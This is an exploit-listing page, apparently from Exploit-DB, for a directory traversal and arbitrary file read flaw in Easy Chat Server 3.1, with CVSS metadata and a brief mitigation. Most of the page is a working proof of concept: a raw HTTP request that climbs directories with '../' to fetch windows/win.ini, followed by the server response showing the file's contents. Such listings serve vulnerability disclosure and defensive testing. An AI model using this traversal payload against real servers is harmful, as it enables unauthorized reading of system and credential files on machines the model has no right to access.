header-logo
Suggest Exploit
vendor:
Easy Chat Server
by:
z4nd3r
7.5
CVSS
HIGH
Directory Traversal and Arbitrary File Read
22
CWE
Product Name: Easy Chat Server
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE:
CPE: a:echatserver:easy_chat_server:3.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro Build 19042
2021

Easy Chat Server 3.1 – Directory Traversal and Arbitrary File Read

The web server allows for directory traversal and reading of arbitrary files on the system, given that the account running the server can access the target file.

Mitigation:

Ensure that the account running the server does not have access to sensitive files.
Source

Exploit-DB raw data:

# Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read
# Date: 11 October 2021
# Exploit Author: z4nd3r
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 10 Pro Build 19042, English
#
# Description: 
# The web server allows for directory traversal and reading of arbitrary files on the
#  system, given that the account running the server can access the target file.


Proof-of-concept using Burp:

Request:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 192.168.50.52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

----------------------------------------

Response:

HTTP/1.0 200 OK
Date: Thu, 21 Oct 2021 14:55:57 GMT
Server: Easy Chat Server/1.0
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1